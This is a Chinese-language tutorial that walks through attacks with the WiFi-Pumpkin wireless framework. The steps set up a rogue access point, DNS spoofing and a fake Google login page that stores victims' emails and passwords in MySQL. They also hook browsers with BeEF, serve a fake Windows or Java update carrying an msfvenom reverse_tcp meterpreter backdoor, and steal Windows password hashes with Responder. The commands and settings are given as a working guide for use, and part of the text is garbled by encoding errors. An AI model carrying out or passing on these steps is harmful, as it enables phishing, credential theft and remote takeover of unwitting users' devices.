描述
WiFi-Pumpkin是一款專用于無線環境滲透測試的完整框架,利用該工具可以偽造接入點完成中間人攻擊,同時也支持一些其他的無線滲透測試功能。旨在提供更安全的無線網絡服務,該工具可以用來監聽目標的流量數據,通過無線釣魚的方式來捕獲不知情的用戶,以此來達到監控目標用戶數據流量的目的。
主要功能
Rouge WiFi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM
Karma Attack (supporthostapd-mana)
LLMNR,NBT-NS and MDNSpoisoner(Responder)
Pumpkin-Proxy(ProxyServer(mitmproxyAPI))
Capture images on the fly
TCP-Proxy(with scapy)
插件
Plugin
Description
Dns2proxy
This tools offer a deffierent features for post-explotation once you change the DNS server to a Victim.
Sslstrip2
Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork
Sergio-proxy
Sergio Proxy(a Super Effective Recorder of Gathered inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng
Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy.
Responder
Responder an LLMNR, NBT-NS and MDNS poisoner.
Transparent Proxy:
TransparentProxy可以允許用戶攔截/修改流量信息,同時可以實現目標頁面的javascripts注入,也可以輕松實現模塊化注入并創建一個Python文件(plugins/extension/目錄下),最后在PumpProxy(標簽)下顯示信息。

TCP-Proxy Server
在TCP stream中你可以設置一個代理。它可以通過scapy模塊過濾請求和響應流并且主動修改TCP protocol的數據包來獲得攔截。這插件使用模塊來view或者modify這攔截數據,僅僅加你的自定義模塊在”plugins/analyzers/”,自動被列舉在TCP-Proxy標簽。
安裝WiFi-Pumpkin
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
pip install –r requirements.txt
./installer.sh –install
運行WiFi-Pumpkin:python wifi-pumpkin.py
創建釣魚頁面
設置MYSQL
/etc/init.d/mysql start
Mysql –u root
Create database xeus;
Use xeus;
Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

下載Fake Page
git clone https://github.com/XeusHack/Fake-Login-Page.git
將Fake-Login-Page文件放到/var/www目錄下。
編輯database.php文件,設置文件內容:
$username = “root”;
$password = “”;
$db_name = “xeus”;
$tbl_name = “logins”;
這里設置的內容根據自己的環境而設定,我這里是我的環境。
重啟mysql:/etc/init.d/mysql restart
設置WiFi-Pumpkin
運行WiFi-Pumpkin,進入此目錄下,python WiFi-Pumpkin.py

切換到Settings命令,可以設置SSID號,我這里直接選擇默認的PumpAP,信道號為11,這里我選擇了Enable Wireless Security,密碼為1234567890等。注意:這里NetworkAdapter是無線網卡的名稱,需要買一個無線網卡。

然后往下拉,可以看到默認設置dhcp服務設置的信息,這里保持默認就行。
取消代理,在旁邊Plugins點擊,然后取消proxy server,如圖所示。

點擊Start,然后可以在手機上可以看到SSID為PumpAP的無線熱點。可以看到是加密狀態,輸入設置的密碼;1234567890,就可以連接上。

然后點擊Modules選項下的DNS Spoofer,進入頁面,以DNSSpoof默認域名example.com為例,點擊Start Attack。使DNS SpoofRunning…

選擇PhishingManager模塊,選擇Options里面的index.html,點擊StartServer。然后在手機客戶端連接上PumpAP無線熱點后,輸入example.com域名后,出現了設置的信息。
然后選擇SetDirectory,如圖所示,將上面設置的Fake-Login-Page路徑設置到SetEnv PATH里面,然后點擊StartServer?梢钥吹皆谑謾C客戶端里面出現的相關偽造的頁面。

在上面的偽造google頁面輸入郵箱和密碼之后,然后進入mysql的logins表中,可以看到相關的信息。

Beef配合攻擊
在/usr/share/beef-xss目錄下運行./beef。如圖所示。選擇其中的Hook URL。

然后http://127.0.0.1:3000/ui/authentication登陸beef,默認賬號和密碼都是beef。
按照上面設置PumpAP無線熱點過程,進入到Phishing Manager模塊,選中按照如圖所示進行設置。

然后點擊StartServer運行,然后在手機客戶端連接上PumpAP無線熱點,然后打開example.com域名。在beef頁面會出現受攻擊的機器。然后可以通過beef進入深入攻擊了。

反彈shell
生成一個shellcode后門,利用msfvenom命令:mefvenom –pwindows/meterpreter/reverse_tcp lhost=你的本機IP地址 lport=4444 –f exe –o windowsupdate.exe進入msfconsole界面,等待shell連接。

按照設置WiFi-Pumokin,進入DNS Spoofer界面,然后刪除DNS:spoof;里面的example.com,然后自己填入一個域名(我這里依然選擇example.com),這里注意一定要刪除之前的example.com,要不會占用一個端口,后面操作不會成功的。

在DNS spoofer頁面選擇Fake Update,進入此頁面,然后將自己生產的shellcode后門加入該路徑,這里可以選擇WindowsUpdate或者Java Update更新,Network Adapter要選擇wlan0,自己的無線網卡。

然后在目標機器連接到我的偽造的PumpAP無線熱點,輸入example.com域名。可以進入上面選擇的偽造頁面。

javaUpdate頁面如下圖所示。

如果被攻擊者電腦下載了我們的后門,安裝了后門。那么我們就可以在kali里面獲取它的電腦權限。

Stealing Accouts Password Hashes
運行WiFi-Pumpkin程序,在界面上Advanced Mode:Monitor MITM Attack選擇Responder。如圖所示。

然后在Plugins選擇Responder,并且關閉Enable proxy server.可以在change打開配置頁面。(一般默認就好,也可以根據自己想要抓取的選擇開啟和關閉),如圖所示。


我們主要的目的是抓取windows的賬號和密碼,在目標機器上運行此操作,就會在wifi-pumpkin的responder顯示出目標機的用戶名和hash密碼。

總結:
上面的主要是參考部分文章然后自己來驗證的,參考文章如下:
|